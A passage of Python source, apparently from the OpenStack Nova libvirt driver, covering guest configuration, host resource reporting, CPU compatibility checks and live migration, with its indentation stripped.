msg = _("Config requested a custom CPU model, but no "
"model name was provided")
raise exception.Invalid(msg)
elif mode != "custom" and model is not None:
msg = _("A CPU model name should not be set when a "
"host CPU model is requested")
raise exception.Invalid(msg)
LOG.debug(_("CPU mode '%(mode)s' model '%(model)s' was chosen")
% {'mode': mode, 'model': (model or "")})
# TODO(berrange): in the future, when MIN_LIBVIRT_VERSION is
# updated to be at least this new, we can kill off the elif
# blocks here
if self.has_min_version(MIN_LIBVIRT_HOST_CPU_VERSION):
cpu = vconfig.LibvirtConfigGuestCPU()
cpu.mode = mode
cpu.model = model
elif mode == "custom":
cpu = vconfig.LibvirtConfigGuestCPU()
cpu.model = model
elif mode == "host-model":
cpu = self.get_host_cpu_for_guest()
elif mode == "host-passthrough":
msg = _("Passthrough of the host CPU was requested but "
"this libvirt version does not support this feature")
raise exception.NovaException(msg)
return cpu
def get_guest_disk_config(self, instance, name, disk_mapping, inst_type,
image_type=None):
image = self.image_backend.image(instance,
name,
image_type)
disk_info = disk_mapping[name]
return image.libvirt_info(disk_info['bus'],
disk_info['dev'],
disk_info['type'],
self.disk_cachemode,
inst_type['extra_specs'])
def get_guest_storage_config(self, instance, image_meta,
disk_info,
rescue, block_device_info,
inst_type):
devices = []
disk_mapping = disk_info['mapping']
block_device_mapping = driver.block_device_info_get_mapping(
block_device_info)
if CONF.libvirt_type == "lxc":
fs = vconfig.LibvirtConfigGuestFilesys()
fs.source_type = "mount"
fs.source_dir = os.path.join(
libvirt_utils.get_instance_path(instance), 'rootfs')
devices.append(fs)
else:
if rescue:
diskrescue = self.get_guest_disk_config(instance,
'disk.rescue',
disk_mapping,
inst_type)
devices.append(diskrescue)
diskos = self.get_guest_disk_config(instance,
'disk',
disk_mapping,
inst_type)
devices.append(diskos)
else:
if 'disk' in disk_mapping:
diskos = self.get_guest_disk_config(instance,
'disk',
disk_mapping,
inst_type)
devices.append(diskos)
if 'disk.local' in disk_mapping:
disklocal = self.get_guest_disk_config(instance,
'disk.local',
disk_mapping,
inst_type)
devices.append(disklocal)
self.virtapi.instance_update(
nova_context.get_admin_context(), instance['uuid'],
{'default_ephemeral_device':
'/dev/' + disklocal.target_dev})
for eph in driver.block_device_info_get_ephemerals(
block_device_info):
diskeph = self.get_guest_disk_config(
instance,
blockinfo.get_eph_disk(eph),
disk_mapping, inst_type)
devices.append(diskeph)
if 'disk.swap' in disk_mapping:
diskswap = self.get_guest_disk_config(instance,
'disk.swap',
disk_mapping,
inst_type)
devices.append(diskswap)
self.virtapi.instance_update(
nova_context.get_admin_context(), instance['uuid'],
{'default_swap_device': '/dev/' + diskswap.target_dev})
for vol in block_device_mapping:
connection_info = vol['connection_info']
info = disk_mapping[vol['mount_device']]
cfg = self.volume_driver_method('connect_volume',
connection_info,
info)
devices.append(cfg)
if 'disk.config' in disk_mapping:
diskconfig = self.get_guest_disk_config(instance,
'disk.config',
disk_mapping,
inst_type,
'raw')
devices.append(diskconfig)
for d in devices:
self.set_cache_mode(d)
return devices
def get_guest_config_sysinfo(self, instance):
sysinfo = vconfig.LibvirtConfigGuestSysinfo()
sysinfo.system_manufacturer = version.vendor_string()
sysinfo.system_product = version.product_string()
sysinfo.system_version = version.version_string_with_package()
sysinfo.system_serial = self.get_host_uuid()
sysinfo.system_uuid = instance['uuid']
return sysinfo
def get_guest_config(self, instance, network_info, image_meta,
disk_info, rescue=None, block_device_info=None):
"""Get config data for parameters.
:param rescue: optional dictionary that should contain the key
'ramdisk_id' if a ramdisk is needed for the rescue image and
'kernel_id' if a kernel is needed for the rescue image.
"""
inst_type = self.virtapi.instance_type_get(
nova_context.get_admin_context(read_deleted='yes'),
instance['instance_type_id'])
inst_path = libvirt_utils.get_instance_path(instance)
disk_mapping = disk_info['mapping']
guest = vconfig.LibvirtConfigGuest()
guest.virt_type = CONF.libvirt_type
guest.name = instance['name']
guest.uuid = instance['uuid']
guest.memory = inst_type['memory_mb'] * 1024
guest.vcpus = inst_type['vcpus']
quota_items = ['cpu_shares', 'cpu_period', 'cpu_quota']
for key, value in inst_type['extra_specs'].iteritems():
if key in quota_items:
setattr(guest, key, value)
guest.cpu = self.get_guest_cpu_config()
if 'root' in disk_mapping and disk_mapping['root']['dev'] is not None:
root_device_name = "/dev/" + disk_mapping['root']['dev']
else:
root_device_name = None
if root_device_name:
# NOTE(yamahata):
# for nova.api.ec2.cloud.CloudController.get_metadata()
self.virtapi.instance_update(
nova_context.get_admin_context(), instance['uuid'],
{'root_device_name': root_device_name})
guest.os_type = vm_mode.get_from_instance(instance)
if guest.os_type is None:
if CONF.libvirt_type == "lxc":
guest.os_type = vm_mode.EXE
elif CONF.libvirt_type == "uml":
guest.os_type = vm_mode.UML
elif CONF.libvirt_type == "xen":
guest.os_type = vm_mode.XEN
else:
guest.os_type = vm_mode.HVM
if CONF.libvirt_type == "xen" and guest.os_type == vm_mode.HVM:
guest.os_loader = CONF.xen_hvmloader_path
if CONF.libvirt_type in ("kvm", "qemu"):
caps = self.get_host_capabilities()
if caps.host.cpu.arch in ("i686", "x86_64"):
guest.sysinfo = self.get_guest_config_sysinfo(instance)
guest.os_smbios = vconfig.LibvirtConfigGuestSMBIOS()
if CONF.libvirt_type == "lxc":
guest.os_type = vm_mode.EXE
guest.os_init_path = "/sbin/init"
guest.os_cmdline = "console=ttyS0"
elif CONF.libvirt_type == "uml":
guest.os_type = vm_mode.UML
guest.os_kernel = "/usr/bin/linux"
guest.os_root = root_device_name
else:
if CONF.libvirt_type == "xen" and guest.os_type == vm_mode.XEN:
guest.os_root = root_device_name
else:
guest.os_type = vm_mode.HVM
if rescue:
if rescue.get('kernel_id'):
guest.os_kernel = os.path.join(inst_path, "kernel.rescue")
if CONF.libvirt_type == "xen":
guest.os_cmdline = "ro"
else:
guest.os_cmdline = ("root=%s console=ttyS0" %
root_device_name)
if rescue.get('ramdisk_id'):
guest.os_initrd = os.path.join(inst_path, "ramdisk.rescue")
elif instance['kernel_id']:
guest.os_kernel = os.path.join(inst_path, "kernel")
if CONF.libvirt_type == "xen":
guest.os_cmdline = "ro"
else:
guest.os_cmdline = ("root=%s console=ttyS0" %
root_device_name)
if instance['ramdisk_id']:
guest.os_initrd = os.path.join(inst_path, "ramdisk")
else:
guest.os_boot_dev = "hd"
if CONF.libvirt_type != "lxc" and CONF.libvirt_type != "uml":
guest.acpi = True
guest.apic = True
clk = vconfig.LibvirtConfigGuestClock()
clk.offset = "utc"
guest.set_clock(clk)
if CONF.libvirt_type == "kvm":
# TODO(berrange) One day this should be per-guest
# OS type configurable
tmpit = vconfig.LibvirtConfigGuestTimer()
tmpit.name = "pit"
tmpit.tickpolicy = "delay"
tmrtc = vconfig.LibvirtConfigGuestTimer()
tmrtc.name = "rtc"
tmrtc.tickpolicy = "catchup"
clk.add_timer(tmpit)
clk.add_timer(tmrtc)
for cfg in self.get_guest_storage_config(instance,
image_meta,
disk_info,
rescue,
block_device_info,
inst_type):
guest.add_device(cfg)
for (network, mapping) in network_info:
cfg = self.vif_driver.get_config(instance,
network, mapping,
image_meta)
guest.add_device(cfg)
if CONF.libvirt_type == "qemu" or CONF.libvirt_type == "kvm":
# The QEMU 'pty' driver throws away any data if no
# client app is connected. Thus we can't get away
# with a single type=pty console. Instead we have
# to configure two separate consoles.
consolelog = vconfig.LibvirtConfigGuestSerial()
consolelog.type = "file"
consolelog.source_path = self._get_console_log_path(instance)
guest.add_device(consolelog)
consolepty = vconfig.LibvirtConfigGuestSerial()
consolepty.type = "pty"
guest.add_device(consolepty)
else:
consolepty = vconfig.LibvirtConfigGuestConsole()
consolepty.type = "pty"
guest.add_device(consolepty)
# We want a tablet if VNC is enabled,
# or SPICE is enabled and the SPICE agent is disabled
# NB: this implies that if both SPICE + VNC are enabled
# at the same time, we'll get the tablet whether the
# SPICE agent is used or not.
need_usb_tablet = False
if CONF.vnc_enabled:
need_usb_tablet = CONF.use_usb_tablet
elif CONF.spice.enabled and not CONF.spice.agent_enabled:
need_usb_tablet = CONF.use_usb_tablet
if need_usb_tablet and guest.os_type == vm_mode.HVM:
tablet = vconfig.LibvirtConfigGuestInput()
tablet.type = "tablet"
tablet.bus = "usb"
guest.add_device(tablet)
if CONF.spice.enabled and CONF.spice.agent_enabled and \
CONF.libvirt_type not in ('lxc', 'uml', 'xen'):
channel = vconfig.LibvirtConfigGuestChannel()
channel.target_name = "com.redhat.spice.0"
guest.add_device(channel)
# NB some versions of libvirt support both SPICE and VNC
# at the same time. We're not trying to second guess which
# those versions are. We'll just let libvirt report the
# errors appropriately if the user enables both.
if CONF.vnc_enabled and CONF.libvirt_type not in ('lxc', 'uml'):
graphics = vconfig.LibvirtConfigGuestGraphics()
graphics.type = "vnc"
graphics.keymap = CONF.vnc_keymap
graphics.listen = CONF.vncserver_listen
guest.add_device(graphics)
if CONF.spice.enabled and \
CONF.libvirt_type not in ('lxc', 'uml', 'xen'):
graphics = vconfig.LibvirtConfigGuestGraphics()
graphics.type = "spice"
graphics.keymap = CONF.spice.keymap
graphics.listen = CONF.spice.server_listen
guest.add_device(graphics)
return guest
def to_xml(self, instance, network_info, disk_info,
image_meta=None, rescue=None,
block_device_info=None, write_to_disk=False):
LOG.debug(_("Start to_xml instance=%(instance)s "
"network_info=%(network_info)s "
"disk_info=%(disk_info)s "
"image_meta=%(image_meta)s rescue=%(rescue)s"
"block_device_info=%(block_device_info)s") %
locals())
conf = self.get_guest_config(instance, network_info, image_meta,
disk_info, rescue, block_device_info)
xml = conf.to_xml()
if write_to_disk:
instance_dir = libvirt_utils.get_instance_path(instance)
xml_path = os.path.join(instance_dir, 'libvirt.xml')
libvirt_utils.write_to_file(xml_path, xml)
LOG.debug(_('End to_xml instance=%(instance)s xml=%(xml)s') % locals())
return xml
def _lookup_by_name(self, instance_name):
"""Retrieve libvirt domain object given an instance name.
All libvirt error handling should be handled in this method and
relevant nova exceptions should be raised in response.
"""
try:
return self._conn.lookupByName(instance_name)
except libvirt.libvirtError as ex:
error_code = ex.get_error_code()
if error_code == libvirt.VIR_ERR_NO_DOMAIN:
raise exception.InstanceNotFound(instance_id=instance_name)
msg = _("Error from libvirt while looking up %(instance_name)s: "
"[Error Code %(error_code)s] %(ex)s") % locals()
raise exception.NovaException(msg)
def get_info(self, instance):
"""Retrieve information from libvirt for a specific instance name.
If a libvirt error is encountered during lookup, we might raise a
NotFound exception or Error exception depending on how severe the
libvirt error is.
"""
virt_dom = self._lookup_by_name(instance['name'])
(state, max_mem, mem, num_cpu, cpu_time) = virt_dom.info()
return {'state': LIBVIRT_POWER_STATE[state],
'max_mem': max_mem,
'mem': mem,
'num_cpu': num_cpu,
'cpu_time': cpu_time,
'id': virt_dom.ID()}
def _create_domain(self, xml=None, domain=None,
instance=None, launch_flags=0):
"""Create a domain.
Either domain or xml must be passed in. If both are passed, then
the domain definition is overwritten from the xml.
"""
inst_path = None
if instance:
inst_path = libvirt_utils.get_instance_path(instance)
if CONF.libvirt_type == 'lxc':
if not inst_path:
inst_path = None
container_dir = os.path.join(inst_path, 'rootfs')
fileutils.ensure_tree(container_dir)
image = self.image_backend.image(instance, 'disk')
disk.setup_container(image.path,
container_dir=container_dir,
use_cow=CONF.use_cow_images)
if xml:
domain = self._conn.defineXML(xml)
domain.createWithFlags(launch_flags)
self._enable_hairpin(domain.XMLDesc(0))
# NOTE(uni): Now the container is running with its own private mount
# namespace and so there is no need to keep the container rootfs
# mounted in the host namespace
if CONF.libvirt_type == 'lxc':
state = self.get_info(instance)['state']
container_dir = os.path.join(inst_path, 'rootfs')
if state == power_state.RUNNING:
disk.clean_lxc_namespace(container_dir=container_dir)
else:
disk.teardown_container(container_dir=container_dir)
return domain
def _create_domain_and_network(self, xml, instance, network_info,
block_device_info=None):
"""Do required network setup and create domain."""
block_device_mapping = driver.block_device_info_get_mapping(
block_device_info)
for vol in block_device_mapping:
connection_info = vol['connection_info']
disk_dev = vol['mount_device'].rpartition("/")[2]
disk_info = {
'dev': disk_dev,
'bus': blockinfo.get_disk_bus_for_disk_dev(CONF.libvirt_type,
disk_dev),
'type': 'disk',
}
self.volume_driver_method('connect_volume',
connection_info,
disk_info)
self.plug_vifs(instance, network_info)
self.firewall_driver.setup_basic_filtering(instance, network_info)
self.firewall_driver.prepare_instance_filter(instance, network_info)
domain = self._create_domain(xml, instance=instance)
self.firewall_driver.apply_instance_filter(instance, network_info)
return domain
def get_all_block_devices(self):
"""
Return all block devices in use on this node.
"""
devices = []
for dom_id in self.list_instance_ids():
try:
domain = self._conn.lookupByID(dom_id)
doc = etree.fromstring(domain.XMLDesc(0))
except Exception:
continue
ret = doc.findall('./devices/disk')
for node in ret:
if node.get('type') != 'block':
continue
for child in node.getchildren():
if child.tag == 'source':
devices.append(child.get('dev'))
return devices
def get_disks(self, instance_name):
"""
Note that this function takes an instance name.
Returns a list of all block devices for this domain.
"""
domain = self._lookup_by_name(instance_name)
xml = domain.XMLDesc(0)
try:
doc = etree.fromstring(xml)
except Exception:
return []
return filter(bool,
[target.get("dev")
for target in doc.findall('devices/disk/target')])
def get_interfaces(self, xml):
"""
Note that this function takes a domain xml.
Returns a list of all network interfaces for this instance.
"""
doc = None
try:
doc = etree.fromstring(xml)
except Exception:
return []
interfaces = []
ret = doc.findall('./devices/interface')
for node in ret:
devdst = None
for child in list(node):
if child.tag == 'target':
devdst = child.attrib['dev']
if devdst is None:
continue
interfaces.append(devdst)
return interfaces
def get_vcpu_total(self):
"""Get vcpu number of physical computer.
:returns: the number of cpu core.
"""
try:
return self._conn.getInfo()[2]
except libvirt.libvirtError:
LOG.warn(_("Cannot get the number of cpu, because this "
"function is not implemented for this platform. "))
return 0
def get_memory_mb_total(self):
"""Get the total memory size(MB) of physical computer.
:returns: the total amount of memory(MB).
"""
return self._conn.getInfo()[1]
@staticmethod
def get_local_gb_info():
"""Get local storage info of the compute node in GB.
:returns: A dict containing:
:total: How big the overall usable filesystem is (in gigabytes)
:free: How much space is free (in gigabytes)
:used: How much space is used (in gigabytes)
"""
if CONF.libvirt_images_type == 'lvm':
info = libvirt_utils.get_volume_group_info(
CONF.libvirt_images_volume_group)
else:
info = libvirt_utils.get_fs_info(CONF.instances_path)
for (k, v) in info.iteritems():
info[k] = v / (1024 ** 3)
return info
def get_vcpu_used(self):
"""Get vcpu usage number of physical computer.
:returns: The total number of vcpu that currently used.
"""
total = 0
if CONF.libvirt_type == 'lxc':
return total + 1
dom_ids = self.list_instance_ids()
for dom_id in dom_ids:
try:
dom = self._conn.lookupByID(dom_id)
vcpus = dom.vcpus()
if vcpus is None:
LOG.debug(_("couldn't obtain the vpu count from domain id:"
" %s") % dom_id)
else:
total += len(vcpus[1])
except libvirt.libvirtError as err:
if err.get_error_code() == libvirt.VIR_ERR_NO_DOMAIN:
LOG.debug(_("List of domains returned by libVirt: %s")
% dom_ids)
LOG.warn(_("libVirt can't find a domain with id: %s")
% dom_id)
continue
raise
# NOTE(gtt116): give change to do other task.
greenthread.sleep(0)
return total
def get_memory_mb_used(self):
"""Get the free memory size(MB) of physical computer.
:returns: the total usage of memory(MB).
"""
if sys.platform.upper() not in ['LINUX2', 'LINUX3']:
return 0
m = open('/proc/meminfo').read().split()
idx1 = m.index('MemFree:')
idx2 = m.index('Buffers:')
idx3 = m.index('Cached:')
if CONF.libvirt_type == 'xen':
used = 0
for domain_id in self.list_instance_ids():
# skip dom0
dom_mem = int(self._conn.lookupByID(domain_id).info()[2])
if domain_id != 0:
used += dom_mem
else:
# the mem reported by dom0 is be greater of what
# it is being used
used += (dom_mem -
(int(m[idx1 + 1]) +
int(m[idx2 + 1]) +
int(m[idx3 + 1])))
# Convert it to MB
return used / 1024
else:
avail = (int(m[idx1 + 1]) + int(m[idx2 + 1]) + int(m[idx3 + 1]))
# Convert it to MB
return self.get_memory_mb_total() - avail / 1024
def get_hypervisor_type(self):
"""Get hypervisor type.
:returns: hypervisor type (ex. qemu)
"""
return self._conn.getType()
def get_hypervisor_version(self):
"""Get hypervisor version.
:returns: hypervisor version (ex. 12003)
"""
# NOTE(justinsb): getVersion moved between libvirt versions
# Trying to do be compatible with older versions is a lost cause
# But ... we can at least give the user a nice message
method = getattr(self._conn, 'getVersion', None)
if method is None:
raise exception.NovaException(_("libvirt version is too old"
" (does not support getVersion)"))
# NOTE(justinsb): If we wanted to get the version, we could:
# method = getattr(libvirt, 'getVersion', None)
# NOTE(justinsb): This would then rely on a proper version check
return method()
def get_hypervisor_hostname(self):
"""Returns the hostname of the hypervisor."""
return self._conn.getHostname()
def get_instance_capabilities(self):
"""Get hypervisor instance capabilities
Returns a list of tuples that describe instances the
hypervisor is capable of hosting. Each tuple consists
of the triplet (arch, hypervisor_type, vm_mode).
:returns: List of tuples describing instance capabilities
"""
caps = self.get_host_capabilities()
instance_caps = list()
for g in caps.guests:
for dt in g.domtype:
instance_cap = (g.arch, dt, g.ostype)
instance_caps.append(instance_cap)
return instance_caps
def get_cpu_info(self):
"""Get cpuinfo information.
Obtains cpu feature from virConnect.getCapabilities,
and returns as a json string.
:return: see above description
"""
caps = self.get_host_capabilities()
cpu_info = dict()
cpu_info['arch'] = caps.host.cpu.arch
cpu_info['model'] = caps.host.cpu.model
cpu_info['vendor'] = caps.host.cpu.vendor
topology = dict()
topology['sockets'] = caps.host.cpu.sockets
topology['cores'] = caps.host.cpu.cores
topology['threads'] = caps.host.cpu.threads
cpu_info['topology'] = topology
features = list()
for f in caps.host.cpu.features:
features.append(f.name)
cpu_info['features'] = features
# TODO(berrange): why do we bother converting the
# libvirt capabilities XML into a special JSON format ?
# The data format is different across all the drivers
# so we could just return the raw capabilties XML
# which 'compare_cpu' could use directly
#
# That said, arch_filter.py now seems to rely on
# the libvirt drivers format which suggests this
# data format needs to be standardized across drivers
return jsonutils.dumps(cpu_info)
def get_all_volume_usage(self, context, compute_host_bdms):
"""Return usage info for volumes attached to vms on
a given host"""
vol_usage = []
for instance_bdms in compute_host_bdms:
instance = instance_bdms['instance']
for bdm in instance_bdms['instance_bdms']:
vol_stats = []
mountpoint = bdm['device_name']
if mountpoint.startswith('/dev/'):
mountpoint = mountpoint[5:]
LOG.debug(_("Trying to get stats for the volume %s"),
bdm['volume_id'])
vol_stats = self.block_stats(instance['name'], mountpoint)
if vol_stats:
rd_req, rd_bytes, wr_req, wr_bytes, flush_ops = vol_stats
vol_usage.append(dict(volume=bdm['volume_id'],
instance=instance,
rd_req=rd_req,
rd_bytes=rd_bytes,
wr_req=wr_req,
wr_bytes=wr_bytes,
flush_operations=flush_ops))
return vol_usage
def block_stats(self, instance_name, disk):
"""
Note that this function takes an instance name.
"""
try:
domain = self._lookup_by_name(instance_name)
return domain.blockStats(disk)
except libvirt.libvirtError as e:
errcode = e.get_error_code()
LOG.info(_("Getting block stats failed, device might have "
"been detached. Code=%(errcode)s Error=%(e)s")
% locals())
except exception.InstanceNotFound:
LOG.info(_("Could not find domain in libvirt for instance %s. "
"Cannot get block stats for device") % instance_name)
def interface_stats(self, instance_name, interface):
"""
Note that this function takes an instance name.
"""
domain = self._lookup_by_name(instance_name)
return domain.interfaceStats(interface)
def get_console_pool_info(self, console_type):
#TODO(mdragon): console proxy should be implemented for libvirt,
# in case someone wants to use it with kvm or
# such. For now return fake data.
return {'address': '127.0.0.1',
'username': 'fakeuser',
'password': 'fakepassword'}
def refresh_security_group_rules(self, security_group_id):
self.firewall_driver.refresh_security_group_rules(security_group_id)
def refresh_security_group_members(self, security_group_id):
self.firewall_driver.refresh_security_group_members(security_group_id)
def refresh_instance_security_rules(self, instance):
self.firewall_driver.refresh_instance_security_rules(instance)
def refresh_provider_fw_rules(self):
self.firewall_driver.refresh_provider_fw_rules()
def get_available_resource(self, nodename):
"""Retrieve resource info.
This method is called as a periodic task and is used only
in live migration currently.
:param nodename: ignored in this driver
:returns: dictionary containing resource info
"""
def _get_disk_available_least():
"""Return total real disk available least size.
The size of available disk, when block_migration command given
disk_over_commit param is FALSE.
The size that deducted real instance disk size from the total size
of the virtual disk of all instances.
"""
disk_free_gb = disk_info_dict['free']
disk_over_committed = self.get_disk_over_committed_size_total()
# Disk available least size
available_least = disk_free_gb * (1024 ** 3) - disk_over_committed
return (available_least / (1024 ** 3))
disk_info_dict = self.get_local_gb_info()
dic = {'vcpus': self.get_vcpu_total(),
'memory_mb': self.get_memory_mb_total(),
'local_gb': disk_info_dict['total'],
'vcpus_used': self.get_vcpu_used(),
'memory_mb_used': self.get_memory_mb_used(),
'local_gb_used': disk_info_dict['used'],
'hypervisor_type': self.get_hypervisor_type(),
'hypervisor_version': self.get_hypervisor_version(),
'hypervisor_hostname': self.get_hypervisor_hostname(),
'cpu_info': self.get_cpu_info(),
'disk_available_least': _get_disk_available_least()}
return dic
def check_can_live_migrate_destination(self, ctxt, instance_ref,
src_compute_info, dst_compute_info,
block_migration=False,
disk_over_commit=False):
"""Check if it is possible to execute live migration.
This runs checks on the destination host, and then calls
back to the source host to check the results.
:param ctxt: security context
:param instance_ref: nova.db.sqlalchemy.models.Instance
:param block_migration: if true, prepare for block migration
:param disk_over_commit: if true, allow disk over commit
"""
disk_available_mb = None
if block_migration:
disk_available_gb = dst_compute_info['disk_available_least']
disk_available_mb = \
(disk_available_gb * 1024) - CONF.reserved_host_disk_mb
# Compare CPU
src = instance_ref['host']
source_cpu_info = src_compute_info['cpu_info']
self._compare_cpu(source_cpu_info)
# Create file on storage, to be checked on source host
filename = self._create_shared_storage_test_file()
return {"filename": filename,
"block_migration": block_migration,
"disk_over_commit": disk_over_commit,
"disk_available_mb": disk_available_mb}
def check_can_live_migrate_destination_cleanup(self, ctxt,
dest_check_data):
"""Do required cleanup on dest host after check_can_live_migrate calls
:param ctxt: security context
"""
filename = dest_check_data["filename"]
self._cleanup_shared_storage_test_file(filename)
def check_can_live_migrate_source(self, ctxt, instance_ref,
dest_check_data):
"""Check if it is possible to execute live migration.
This checks if the live migration can succeed, based on the
results from check_can_live_migrate_destination.
:param context: security context
:param instance_ref: nova.db.sqlalchemy.models.Instance
:param dest_check_data: result of check_can_live_migrate_destination
"""
# Checking shared storage connectivity
# if block migration, instances_paths should not be on shared storage.
source = CONF.host
filename = dest_check_data["filename"]
block_migration = dest_check_data["block_migration"]
is_volume_backed = dest_check_data.get('is_volume_backed', False)
shared = self._check_shared_storage_test_file(filename)
if block_migration:
if shared:
reason = _("Block migration can not be used "
"with shared storage.")
raise exception.InvalidLocalStorage(reason=reason, path=source)
self._assert_dest_node_has_enough_disk(ctxt, instance_ref,
dest_check_data['disk_available_mb'],
dest_check_data['disk_over_commit'])
elif not shared and not is_volume_backed:
reason = _("Live migration can not be used "
"without shared storage.")
raise exception.InvalidSharedStorage(reason=reason, path=source)
dest_check_data.update({"is_shared_storage": shared})
return dest_check_data
def _assert_dest_node_has_enough_disk(self, context, instance_ref,
available_mb, disk_over_commit):
"""Checks if destination has enough disk for block migration."""
# Libvirt supports qcow2 disk format,which is usually compressed
# on compute nodes.
# Real disk image (compressed) may enlarged to "virtual disk size",
# that is specified as the maximum disk size.
# (See qemu-img -f path-to-disk)
# Scheduler recognizes destination host still has enough disk space
# if real disk size < available disk size
# if disk_over_commit is True,
# otherwise virtual disk size < available disk size.
available = 0
if available_mb:
available = available_mb * (1024 ** 2)
ret = self.get_instance_disk_info(instance_ref['name'])
disk_infos = jsonutils.loads(ret)
necessary = 0
if disk_over_commit:
for info in disk_infos:
necessary += int(info['disk_size'])
else:
for info in disk_infos:
necessary += int(info['virt_disk_size'])
# Check that available disk > necessary disk
if (available - necessary) < 0:
instance_uuid = instance_ref['uuid']
reason = _("Unable to migrate %(instance_uuid)s: "
"Disk of instance is too large(available"
" on destination host:%(available)s "
"< need:%(necessary)s)")
raise exception.MigrationError(reason=reason % locals())
def _compare_cpu(self, cpu_info):
"""Checks the host cpu is compatible to a cpu given by xml.
"xml" must be a part of libvirt.openReadonly().getCapabilities().
return values follows by virCPUCompareResult.
if 0 > return value, do live migration.
'http://libvirt.org/html/libvirt-libvirt.html#virCPUCompareResult'
:param cpu_info: json string that shows cpu feature(see get_cpu_info())
:returns:
None. if given cpu info is not compatible to this server,
raise exception.
"""
# NOTE(berendt): virConnectCompareCPU not working for Xen
if CONF.libvirt_type == 'xen':
return 1
info = jsonutils.loads(cpu_info)
LOG.info(_('Instance launched has CPU info:\n%s') % cpu_info)
cpu = vconfig.LibvirtConfigCPU()
cpu.arch = info['arch']
cpu.model = info['model']
cpu.vendor = info['vendor']
cpu.sockets = info['topology']['sockets']
cpu.cores = info['topology']['cores']
cpu.threads = info['topology']['threads']
for f in info['features']:
cpu.add_feature(vconfig.LibvirtConfigCPUFeature(f))
u = "http://libvirt.org/html/libvirt-libvirt.html#virCPUCompareResult"
m = _("CPU doesn't have compatibility.\n\n%(ret)s\n\nRefer to %(u)s")
# unknown character exists in xml, then libvirt complains
try:
ret = self._conn.compareCPU(cpu.to_xml(), 0)
except libvirt.libvirtError, e:
with excutils.save_and_reraise_exception():
ret = e.message
LOG.error(m % locals())
if ret <= 0:
LOG.error(m % locals())
raise exception.InvalidCPUInfo(reason=m % locals())
def _create_shared_storage_test_file(self):
"""Makes tmpfile under CONF.instances_path."""
dirpath = CONF.instances_path
fd, tmp_file = tempfile.mkstemp(dir=dirpath)
LOG.debug(_("Creating tmpfile %s to notify to other "
"compute nodes that they should mount "
"the same storage.") % tmp_file)
os.close(fd)
return os.path.basename(tmp_file)
def _check_shared_storage_test_file(self, filename):
"""Confirms existence of the tmpfile under CONF.instances_path.
Cannot confirm tmpfile return False."""
tmp_file = os.path.join(CONF.instances_path, filename)
if not os.path.exists(tmp_file):
return False
else:
return True
def _cleanup_shared_storage_test_file(self, filename):
"""Removes existence of the tmpfile under CONF.instances_path."""
tmp_file = os.path.join(CONF.instances_path, filename)
os.remove(tmp_file)
def ensure_filtering_rules_for_instance(self, instance_ref, network_info,
time_module=None):
"""Ensure that an instance's filtering rules are enabled.
When migrating an instance, we need the filtering rules to
be configured on the destination host before starting the
migration.
Also, when restarting the compute service, we need to ensure
that filtering rules exist for all running services.
"""
if not time_module:
time_module = greenthread
self.firewall_driver.setup_basic_filtering(instance_ref, network_info)
self.firewall_driver.prepare_instance_filter(instance_ref,
network_info)
# nwfilters may be defined in a separate thread in the case
# of libvirt non-blocking mode, so we wait for completion
timeout_count = range(CONF.live_migration_retry_count)
while timeout_count:
if self.firewall_driver.instance_filter_exists(instance_ref,
network_info):
break
timeout_count.pop()
if len(timeout_count) == 0:
msg = _('The firewall filter for %s does not exist')
raise exception.NovaException(msg % instance_ref["name"])
time_module.sleep(1)
def filter_defer_apply_on(self):
self.firewall_driver.filter_defer_apply_on()
def filter_defer_apply_off(self):
self.firewall_driver.filter_defer_apply_off()
def live_migration(self, ctxt, instance_ref, dest,
post_method, recover_method, block_migration=False,
migrate_data=None):
"""Spawning live_migration operation for distributing high-load.
:params ctxt: security context
:params instance_ref:
nova.db.sqlalchemy.models.Instance object
instance object that is migrated.
:params dest: destination host
:params block_migration: destination host
:params post_method:
post operation method.
expected nova.compute.manager.post_live_migration.
:params recover_method:
recovery method when any exception occurs.
expected nova.compute.manager.recover_live_migration.
:params block_migration: if true, do block migration.
:params migrate_data: implementation specific params
"""
greenthread.spawn(self._live_migration, ctxt, instance_ref, dest,
post_method, recover_method, block_migration,
migrate_data)
def _live_migration(self, ctxt, instance_ref, dest, post_method,
recover_method, block_migration=False,
migrate_data=None):
"""Do live migration.
:params ctxt: security context
:params instance_ref:
nova.db.sqlalchemy.models.Instance object
instance object that is migrated.
:params dest: destination host
:params post_method:
post operation method.
expected nova.compute.manager.post_live_migration.
:params recover_method:
recovery method when any exception occurs.
expected nova.compute.manager.recover_live_migration.
:params migrate_data: implementation specific params
"""
# Do live migration.
try:
if block_migration:
flaglist = CONF.block_migration_flag.split(',')
else:
flaglist = CONF.live_migration_flag.split(',')
flagvals = [getattr(libvirt, x.strip()) for x in flaglist]
logical_sum = reduce(lambda x, y: x | y, flagvals)
dom = self._lookup_by_name(instance_ref["name"])
dom.migrateToURI(CONF.live_migration_uri % dest,
logical_sum,
None,
CONF.live_migration_bandwidth)
except Exception as e:
with excutils.save_and_reraise_exception():
LOG.error(_("Live Migration failure: %(e)s") % locals(),
instance=instance_ref)
recover_method(ctxt, instance_ref, dest, block_migration)
# Waiting for completion of live_migration.
timer = utils.FixedIntervalLoopingCall(f=None)
def wait_for_live_migration():
"""waiting for live migration completion."""
try:
self.get_info(instance_ref)['state']
except exception.NotFound:
timer.stop()
post_method(ctxt, instance_ref, dest, block_migration,
migrate_data)
timer.f = wait_for_live_migration
timer.start(interval=0.5).wait()
def _fetch_instance_kernel_ramdisk(self, context, instance):
"""Download kernel and ramdisk for instance in instance directory."""
instance_dir = libvirt_utils.get_instance_path(instance)
if instance['kernel_id']:
libvirt_utils.fetch_image(context,
os.path.join(instance_dir, 'kernel'),
instance['kernel_id'],
instance['user_id'],
instance['project_id'])
if instance['ramdisk_id']:
libvirt_utils.fetch_image(context,
os.path.join(instance_dir,
'ramdisk'),
instance['ramdisk_id'],
instance['user_id'],
instance['project_id'])
def pre_live_migration(self, context, instance_ref, block_device_info,
network_info, migrate_data=None):
"""Preparation live migration."""
# Steps for volume backed instance live migration w/o shared storage.
is_shared_storage = True
is_volume_backed = False
is_block_migration = True
if migrate_data:
is_shared_storage = migrate_data.get('is_shared_storage', True)
is_volume_backed = migrate_data.get('is_volume_backed', False)
is_block_migration = migrate_data.get('block_migration', True)
if is_volume_backed and not (is_block_migration or is_shared_storage):
# Create the instance directory on destination compute node.
instance_dir = libvirt_utils.get_instance_path(instance_ref)
if os.path.exists(instance_dir):
raise exception.DestinationDiskExists(path=instance_dir)
os.mkdir(instance_dir)
# Touch the console.log file, required by libvirt.
console_file = self._get_console_log_path(instance_ref)
